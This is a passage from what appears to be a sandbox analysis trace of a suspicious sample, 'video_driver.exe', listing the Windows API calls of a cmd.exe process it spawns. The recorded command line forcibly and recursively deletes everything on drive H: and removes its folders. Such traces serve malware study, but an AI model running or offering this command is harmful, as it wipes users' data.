HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 80 os_tid = 0x3a4 [0067.287] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fcf4 | out: lpSystemTimeAsFileTime=0x28fcf4*(dwLowDateTime=0x5e9ca40, dwHighDateTime=0x1d62400)) [0067.287] GetCurrentProcessId () returned 0x9d8 [0067.287] GetCurrentThreadId () returned 0x3a4 [0067.287] GetTickCount () returned 0x11483ef [0067.287] QueryPerformanceCounter (in: lpPerformanceCount=0x28fcec | out: lpPerformanceCount=0x28fcec*=18742082555) returned 1 [0067.290] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0067.290] __set_app_type (_Type=0x1) [0067.290] __p__fmode () returned 0x770331f4 [0067.290] __p__commode () returned 0x770331fc [0067.290] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0067.290] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0067.290] GetCurrentThreadId () returned 0x3a4 [0067.290] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x3a4) returned 0x60 [0067.291] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0067.291] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0067.291] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.291] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0067.291] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fc84 | out: phkResult=0x28fc84*=0x0) returned 0x2 [0067.291] VirtualQuery (in: lpAddress=0x28fcbb, lpBuffer=0x28fc54, dwLength=0x1c | out: lpBuffer=0x28fc54*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.291] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fc54, dwLength=0x1c | out: lpBuffer=0x28fc54*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0067.291] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fc54, dwLength=0x1c | out: lpBuffer=0x28fc54*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0067.291] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fc54, dwLength=0x1c | out: lpBuffer=0x28fc54*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.291] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fc54, dwLength=0x1c | out: lpBuffer=0x28fc54*(BaseAddress=0x290000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x170000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0067.292] GetConsoleOutputCP () returned 0x1b5 [0067.292] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.292] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0067.292] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.292] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0067.292] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.292] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0067.292] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.292] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0067.293] _get_osfhandle (_FileHandle=0) returned 0x3 [0067.293] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0067.293] GetEnvironmentStringsW () returned 0x6020f8* [0067.293] GetProcessHeap () returned 0x5f0000 [0067.293] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xaca) returned 0x602bd0 [0067.293] FreeEnvironmentStringsW (penv=0x6020f8) returned 1 [0067.293] GetProcessHeap () returned 0x5f0000 [0067.293] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x4) returned 0x601898 [0067.293] GetEnvironmentStringsW () returned 0x6020f8* [0067.293] GetProcessHeap () returned 0x5f0000 [0067.293] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xaca) returned 0x6036a8 [0067.294] FreeEnvironmentStringsW (penv=0x6020f8) returned 1 [0067.294] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ebf4 | out: phkResult=0x28ebf4*=0x68) returned 0x0 [0067.294] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ebfc, lpData=0x28ec00, lpcbData=0x28ebf8*=0x1000 | out: lpType=0x28ebfc*=0x0, lpData=0x28ec00*=0x0, lpcbData=0x28ebf8*=0x1000) returned 0x2 [0067.294] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ebfc, lpData=0x28ec00, lpcbData=0x28ebf8*=0x1000 | out: lpType=0x28ebfc*=0x4, lpData=0x28ec00*=0x1, lpcbData=0x28ebf8*=0x4) returned 0x0 [0067.294] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ebfc, lpData=0x28ec00, lpcbData=0x28ebf8*=0x1000 | out: lpType=0x28ebfc*=0x0, lpData=0x28ec00*=0x1, lpcbData=0x28ebf8*=0x1000) returned 0x2 [0067.294] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ebfc, lpData=0x28ec00, lpcbData=0x28ebf8*=0x1000 | out: lpType=0x28ebfc*=0x4, lpData=0x28ec00*=0x0, lpcbData=0x28ebf8*=0x4) returned 0x0 [0067.294] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ebfc, lpData=0x28ec00, lpcbData=0x28ebf8*=0x1000 | out: lpType=0x28ebfc*=0x4, lpData=0x28ec00*=0x40, lpcbData=0x28ebf8*=0x4) returned 0x0 [0067.294] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ebfc, lpData=0x28ec00, lpcbData=0x28ebf8*=0x1000 | out: lpType=0x28ebfc*=0x4, lpData=0x28ec00*=0x40, lpcbData=0x28ebf8*=0x4) returned 0x0 [0067.294] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ebfc, lpData=0x28ec00, lpcbData=0x28ebf8*=0x1000 | out: lpType=0x28ebfc*=0x0, lpData=0x28ec00*=0x40, lpcbData=0x28ebf8*=0x1000) returned 0x2 [0067.294] RegCloseKey (hKey=0x68) returned 0x0 [0067.294] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ebf4 | out: phkResult=0x28ebf4*=0x68) returned 0x0 [0067.295] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ebfc, lpData=0x28ec00, lpcbData=0x28ebf8*=0x1000 | out: lpType=0x28ebfc*=0x0, lpData=0x28ec00*=0x40, lpcbData=0x28ebf8*=0x1000) returned 0x2 [0067.295] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ebfc, lpData=0x28ec00, lpcbData=0x28ebf8*=0x1000 | out: lpType=0x28ebfc*=0x4, lpData=0x28ec00*=0x1, lpcbData=0x28ebf8*=0x4) returned 0x0 [0067.295] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ebfc, lpData=0x28ec00, lpcbData=0x28ebf8*=0x1000 | out: lpType=0x28ebfc*=0x0, lpData=0x28ec00*=0x1, lpcbData=0x28ebf8*=0x1000) returned 0x2 [0067.295] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ebfc, lpData=0x28ec00, lpcbData=0x28ebf8*=0x1000 | out: lpType=0x28ebfc*=0x4, lpData=0x28ec00*=0x0, lpcbData=0x28ebf8*=0x4) returned 0x0 [0067.295] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ebfc, lpData=0x28ec00, lpcbData=0x28ebf8*=0x1000 | out: lpType=0x28ebfc*=0x4, lpData=0x28ec00*=0x9, lpcbData=0x28ebf8*=0x4) returned 0x0 [0067.295] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ebfc, lpData=0x28ec00, lpcbData=0x28ebf8*=0x1000 | out: lpType=0x28ebfc*=0x4, lpData=0x28ec00*=0x9, lpcbData=0x28ebf8*=0x4) returned 0x0 [0067.295] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ebfc, lpData=0x28ec00, lpcbData=0x28ebf8*=0x1000 | out: lpType=0x28ebfc*=0x0, lpData=0x28ec00*=0x9, lpcbData=0x28ebf8*=0x1000) returned 0x2 [0067.295] RegCloseKey (hKey=0x68) returned 0x0 [0067.295] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6d [0067.295] srand (_Seed=0x5eb34b6d) [0067.295] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"H:\" del /f /s /q \"H:\" & FOR /D %p IN (\"H:\") DO rmdir \"%p\" /s /q" [0067.295] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"H:\" del /f /s /q \"H:\" & FOR /D %p IN (\"H:\") DO rmdir \"%p\" /s /q" [0067.295] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.296] GetProcessHeap () returned 0x5f0000 [0067.296] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x210) returned 0x6020f8 [0067.296] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x602100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0067.296] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0067.296] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0067.296] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.296] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0067.296] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0067.296] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0067.296] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0067.296] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0067.296] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0067.296] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0067.296] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0067.296] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0067.296] GetProcessHeap () returned 0x5f0000 [0067.296] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x602bd0 | out: hHeap=0x5f0000) returned 1 [0067.296] GetEnvironmentStringsW () returned 0x602310* [0067.296] GetProcessHeap () returned 0x5f0000 [0067.296] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xae2) returned 0x604c70 [0067.297] FreeEnvironmentStringsW (penv=0x602310) returned 1 [0067.297] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0067.297] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.297] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0067.297] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0067.297] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0067.297] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0067.297] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0067.297] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0067.297] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0067.297] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0067.297] GetProcessHeap () returned 0x5f0000 [0067.297] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x54) returned 0x6017c8 [0067.297] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f9c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.297] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x28f9c0, lpFilePart=0x28f9bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x28f9bc*="Desktop") returned 0x25 [0067.297] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0067.297] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f73c | out: lpFindFileData=0x28f73c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x605760 [0067.297] FindClose (in: hFindFile=0x605760 | out: hFindFile=0x605760) returned 1 [0067.298] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x28f73c | out: lpFindFileData=0x28f73c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x605760 [0067.298] FindClose (in: hFindFile=0x605760 | out: hFindFile=0x605760) returned 1 [0067.298] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0067.298] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x28f73c | out: lpFindFileData=0x28f73c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x605760 [0067.298] FindClose (in: hFindFile=0x605760 | out: hFindFile=0x605760) returned 1 [0067.298] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0067.298] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0067.298] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0067.298] GetProcessHeap () returned 0x5f0000 [0067.298] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x604c70 | out: hHeap=0x5f0000) returned 1 [0067.298] GetEnvironmentStringsW () returned 0x604180* [0067.298] GetProcessHeap () returned 0x5f0000 [0067.298] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xb36) returned 0x605fa0 [0067.299] FreeEnvironmentStringsW (penv=0x604180) returned 1 [0067.299] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.299] GetProcessHeap () returned 0x5f0000 [0067.299] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6017c8 | out: hHeap=0x5f0000) returned 1 [0067.299] GetProcessHeap () returned 0x5f0000 [0067.299] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x400e) returned 0x606ae0 [0067.299] GetProcessHeap () returned 0x5f0000 [0067.299] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa0) returned 0x602e50 [0067.299] GetProcessHeap () returned 0x5f0000 [0067.300] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606ae0 | out: hHeap=0x5f0000) returned 1 [0067.300] GetConsoleOutputCP () returned 0x1b5 [0067.300] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.300] GetUserDefaultLCID () returned 0x409 [0067.300] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0067.301] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28fb00, cchData=128 | out: lpLCData="0") returned 2 [0067.301] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28fb00, cchData=128 | out: lpLCData="0") returned 2 [0067.301] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28fb00, cchData=128 | out: lpLCData="1") returned 2 [0067.301] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0067.301] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0067.301] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0067.301] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0067.301] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0067.301] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0067.301] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0067.301] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0067.301] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0067.301] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0067.301] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0067.302] GetProcessHeap () returned 0x5f0000 [0067.302] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20c) returned 0x602ef8 [0067.303] GetConsoleTitleW (in: lpConsoleTitle=0x602ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0067.303] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0067.303] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0067.303] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0067.303] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0067.303] GetProcessHeap () returned 0x5f0000 [0067.303] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x400a) returned 0x606ae0 [0067.303] GetProcessHeap () returned 0x5f0000 [0067.303] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x4008) returned 0x60aaf8 [0067.304] GetProcessHeap () returned 0x5f0000 [0067.304] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1a) returned 0x6057e0 [0067.304] GetEnvironmentVariableW (in: lpName="p IN (\"H", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.304] _wcsicmp (_String1="p IN (\"H", _String2="CD") returned 13 [0067.304] _wcsicmp (_String1="p IN (\"H", _String2="ERRORLEVEL") returned 11 [0067.304] _wcsicmp (_String1="p IN (\"H", _String2="CMDEXTVERSION") returned 13 [0067.304] _wcsicmp (_String1="p IN (\"H", _String2="CMDCMDLINE") returned 13 [0067.304] _wcsicmp (_String1="p IN (\"H", _String2="DATE") returned 12 [0067.304] _wcsicmp (_String1="p IN (\"H", _String2="TIME") returned -4 [0067.304] _wcsicmp (_String1="p IN (\"H", _String2="RANDOM") returned -2 [0067.304] _wcsicmp (_String1="p IN (\"H", _String2="HIGHESTNUMANODENUMBER") returned 8 [0067.304] GetProcessHeap () returned 0x5f0000 [0067.304] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6057e0 | out: hHeap=0x5f0000) returned 1 [0067.304] GetProcessHeap () returned 0x5f0000 [0067.304] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60aaf8 | out: hHeap=0x5f0000) returned 1 [0067.304] GetProcessHeap () returned 0x5f0000 [0067.304] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x4008) returned 0x60aaf8 [0067.304] GetProcessHeap () returned 0x5f0000 [0067.304] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60aaf8 | out: hHeap=0x5f0000) returned 1 [0067.304] GetProcessHeap () returned 0x5f0000 [0067.304] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606ae0 | out: hHeap=0x5f0000) returned 1 [0067.305] _wcsicmp (_String1="if", _String2=")") returned 64 [0067.305] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0067.305] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0067.305] _wcsicmp (_String1="IF", _String2="if") returned 0 [0067.305] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0067.305] GetProcessHeap () returned 0x5f0000 [0067.305] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x58) returned 0x603110 [0067.305] GetProcessHeap () returned 0x5f0000 [0067.305] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xe) returned 0x5fffc0 [0067.305] GetProcessHeap () returned 0x5f0000 [0067.305] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x20) returned 0x6057e0 [0067.306] GetProcessHeap () returned 0x5f0000 [0067.306] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6057e0, Size=0x16) returned 0x601800 [0067.306] GetProcessHeap () returned 0x5f0000 [0067.306] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x601800) returned 0x16 [0067.306] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0067.306] GetProcessHeap () returned 0x5f0000 [0067.306] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x58) returned 0x603170 [0067.306] GetProcessHeap () returned 0x5f0000 [0067.306] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x14) returned 0x6031d0 [0067.306] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0067.306] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0067.307] GetProcessHeap () returned 0x5f0000 [0067.307] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x12) returned 0x6031f0 [0067.307] GetProcessHeap () returned 0x5f0000 [0067.307] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1c) returned 0x6057e0 [0067.307] GetProcessHeap () returned 0x5f0000 [0067.307] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6057e0, Size=0x14) returned 0x603210 [0067.307] GetProcessHeap () returned 0x5f0000 [0067.307] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x603210) returned 0x14 [0067.307] _wcsicmp (_String1="del", _String2=")") returned 59 [0067.307] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0067.307] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0067.307] _wcsicmp (_String1="IF", _String2="del") returned 5 [0067.307] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0067.307] _wcsicmp (_String1="REM", _String2="del") returned 14 [0067.307] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0067.307] GetProcessHeap () returned 0x5f0000 [0067.307] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x58) returned 0x603230 [0067.307] GetProcessHeap () returned 0x5f0000 [0067.308] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x10) returned 0x5fffd8 [0067.308] GetProcessHeap () returned 0x5f0000 [0067.308] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x28) returned 0x603290 [0067.309] GetProcessHeap () returned 0x5f0000 [0067.309] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x58) returned 0x6032c0 [0067.309] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0067.309] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0067.309] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0067.309] GetProcessHeap () returned 0x5f0000 [0067.309] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x58) returned 0x603320 [0067.309] GetProcessHeap () returned 0x5f0000 [0067.309] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x44) returned 0x603380 [0067.309] GetProcessHeap () returned 0x5f0000 [0067.309] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x14) returned 0x6033d0 [0067.310] GetProcessHeap () returned 0x5f0000 [0067.310] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6033d0, Size=0x12) returned 0x6033d0 [0067.310] GetProcessHeap () returned 0x5f0000 [0067.310] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6033d0) returned 0x12 [0067.310] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0067.310] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0067.310] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0067.310] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0067.310] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0067.310] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0067.310] _wcsicmp (_String1="IN", _String2="IN") returned 